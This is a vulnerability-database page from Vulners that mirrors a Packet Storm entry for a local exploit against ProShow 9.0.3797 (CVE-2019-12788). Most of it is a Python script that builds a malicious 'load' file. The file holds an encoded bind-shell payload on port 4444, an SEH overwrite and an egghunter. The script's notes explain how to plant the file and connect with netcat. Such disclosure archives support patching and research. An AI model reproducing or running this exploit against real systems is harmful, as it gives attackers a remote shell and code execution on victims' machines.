Vulners
Lucene search
ProShow 9.0.3797 Privilege Escalation
🗓️ 11 Jun 2019 00:00:00Reported by Yonatan CorreaType 
packetstorm🔗 packetstormsecurity.com👁 78 Views
| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
 | ProShow 9.0.3797 - Local Privilege Escalation Exploit | 11 Jun 201900:00 | – | zdt |
 | Photodex ProShow Producer Buffer Overflow Vulnerability (CNVD-2019-17111) | 11 Jun 201900:00 | – | cnvd |
 | CVE-2019-12788 | 10 Jun 201918:14 | – | cve |
 | CVE-2019-12788 | 10 Jun 201918:14 | – | cvelist |
 | EUVD-2019-4371 | 7 Oct 202500:30 | – | euvd |
 | CVE-2019-12788 | 10 Jun 201919:29 | – | nvd |
 | Buffer overflow | 10 Jun 201919:29 | – | prion |
 | CVE-2019-12788 | 7 Jan 202609:27 | – | redhatcve |
`#!/usr/bin/python
# _*_ coding:utf-8 _*_
# Exploit Title: ProShow v9.0.3797 Local Exploit
# Exploit Author: @Yonatan_Correa
# website with details: https://risataim.blogspot.com/2019/06/exploit-local-para-proshow.html
# Vendor Homepage: http://www.photodex.com/ProShow
# Software Link: http://files.photodex.com/release/pspro_90_3797.exe
# Version: v9.0.3797
# Tested on: Wind 7
from struct import pack
informacion = """
ProShow v9.0.3797
http://www.photodex.com/ProShow
execute exploit
create a file called "load"
copy load "C:\Program Files\Photodex\ProShow Producer\"
"C:\Program Files\Photodex\ProShow Producer\proshow.exe"
And connect nc -nv IP_Host 4444
Testing: Windows 7
@Yonatan_Correa
https://risataim.blogspot.com/2019/06/exploit-local-para-proshow.html
"""
# msfvenom -a x86 --platform windows -p windows/shell_bind_tcp -e x86/alpha_mixed LPORT=4444 EXITFUNC=seh -f c
# Payload size: 717 bytes
shell = "yonayona" + ("\x89\xe5\xda\xc2\xd9\x75\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x4a\x4a"
"\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37\x52\x59\x6a\x41"
"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x6b"
"\x4c\x59\x78\x4f\x72\x57\x70\x65\x50\x45\x50\x53\x50\x6d\x59"
"\x39\x75\x75\x61\x4f\x30\x45\x34\x6c\x4b\x30\x50\x66\x50\x6e"
"\x6b\x30\x52\x74\x4c\x6e\x6b\x36\x32\x77\x64\x6c\x4b\x72\x52"
"\x36\x48\x66\x6f\x4c\x77\x42\x6a\x46\x46\x75\x61\x79\x6f\x4e"
"\x4c\x55\x6c\x50\x61\x51\x6c\x55\x52\x64\x6c\x77\x50\x79\x51"
"\x38\x4f\x36\x6d\x53\x31\x79\x57\x4a\x42\x49\x62\x42\x72\x42"
"\x77\x4e\x6b\x32\x72\x64\x50\x4e\x6b\x71\x5a\x55\x6c\x4c\x4b"
"\x32\x6c\x37\x61\x31\x68\x79\x73\x43\x78\x67\x71\x58\x51\x52"
"\x71\x4c\x4b\x51\x49\x65\x70\x43\x31\x68\x53\x4c\x4b\x70\x49"
"\x42\x38\x4a\x43\x47\x4a\x71\x59\x6c\x4b\x76\x54\x6e\x6b\x53"
"\x31\x4e\x36\x64\x71\x79\x6f\x4c\x6c\x69\x51\x38\x4f\x66\x6d"
"\x67\x71\x48\x47\x56\x58\x6d\x30\x64\x35\x38\x76\x65\x53\x53"
"\x4d\x59\x68\x35\x6b\x73\x4d\x65\x74\x54\x35\x58\x64\x72\x78"
"\x4c\x4b\x52\x78\x46\x44\x76\x61\x58\x53\x35\x36\x4c\x4b\x56"
"\x6c\x50\x4b\x4e\x6b\x30\x58\x57\x6c\x57\x71\x49\x43\x4e\x6b"
"\x75\x54\x4e\x6b\x56\x61\x48\x50\x4f\x79\x42\x64\x75\x74\x64"
"\x64\x61\x4b\x43\x6b\x33\x51\x43\x69\x50\x5a\x73\x61\x69\x6f"
"\x6b\x50\x63\x6f\x53\x6f\x32\x7a\x6c\x4b\x47\x62\x5a\x4b\x4c"
"\x4d\x71\x4d\x43\x58\x70\x33\x77\x42\x35\x50\x53\x30\x35\x38"
"\x63\x47\x43\x43\x34\x72\x61\x4f\x46\x34\x71\x78\x62\x6c\x51"
"\x67\x67\x56\x73\x37\x39\x6f\x58\x55\x68\x38\x4a\x30\x67\x71"
"\x33\x30\x35\x50\x76\x49\x78\x44\x46\x34\x36\x30\x62\x48\x46"
"\x49\x6b\x30\x50\x6b\x65\x50\x79\x6f\x48\x55\x43\x5a\x37\x78"
"\x50\x59\x62\x70\x5a\x42\x4b\x4d\x51\x50\x70\x50\x73\x70\x30"
"\x50\x61\x78\x4b\x5a\x44\x4f\x39\x4f\x39\x70\x69\x6f\x68\x55"
"\x4d\x47\x70\x68\x77\x72\x43\x30\x47\x61\x73\x6c\x4f\x79\x4d"
"\x36\x52\x4a\x66\x70\x31\x46\x61\x47\x35\x38\x69\x52\x39\x4b"
"\x44\x77\x73\x57\x69\x6f\x6b\x65\x76\x37\x71\x78\x78\x37\x4a"
"\x49\x64\x78\x39\x6f\x79\x6f\x79\x45\x62\x77\x62\x48\x54\x34"
"\x78\x6c\x57\x4b\x79\x71\x79\x6f\x5a\x75\x63\x67\x4e\x77\x33"
"\x58\x30\x75\x32\x4e\x70\x4d\x33\x51\x59\x6f\x6a\x75\x65\x38"
"\x53\x53\x50\x6d\x71\x74\x47\x70\x4b\x39\x6a\x43\x61\x47\x76"
"\x37\x36\x37\x76\x51\x6b\x46\x72\x4a\x37\x62\x52\x79\x63\x66"
"\x7a\x42\x6b\x4d\x61\x76\x6f\x37\x32\x64\x55\x74\x45\x6c\x76"
"\x61\x75\x51\x4e\x6d\x43\x74\x77\x54\x34\x50\x49\x56\x47\x70"
"\x51\x54\x32\x74\x56\x30\x62\x76\x73\x66\x52\x76\x43\x76\x56"
"\x36\x62\x6e\x50\x56\x71\x46\x53\x63\x51\x46\x61\x78\x52\x59"
"\x5a\x6c\x67\x4f\x4d\x56\x59\x6f\x6e\x35\x6c\x49\x6d\x30\x70"
"\x4e\x71\x46\x61\x56\x79\x6f\x44\x70\x45\x38\x56\x68\x4c\x47"
"\x45\x4d\x75\x30\x6b\x4f\x79\x45\x4d\x6b\x4b\x4e\x76\x6e\x54"
"\x72\x48\x6a\x35\x38\x59\x36\x5a\x35\x6d\x6d\x6d\x4d\x49\x6f"
"\x6e\x35\x55\x6c\x36\x66\x43\x4c\x44\x4a\x4d\x50\x59\x6b\x6b"
"\x50\x72\x55\x75\x55\x6f\x4b\x32\x67\x74\x53\x74\x32\x70\x6f"
"\x72\x4a\x73\x30\x52\x73\x39\x6f\x59\x45\x41\x41")
junk = shell + ("\x41" * 9479) # 10204
nseh = "\xEB\x06\x90\x90"
seh = pack('<I',0x10045f50) # pop pop ret
nop = "\x90" * 86
nop2 = "\x90" * 10
egg = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
"\xef\xb8\x79\x6f\x6e\x61\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
todo = junk + nseh + seh + nop + egg + nop2
arch = open("load", "wb")
arch.write(todo)
arch.close()
print informacion
print "\nCreated File size " + str(len(todo))
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 Jun 2019 00:00Current
0.6Low risk
Vulners AI Score0.6
EPSS0.0285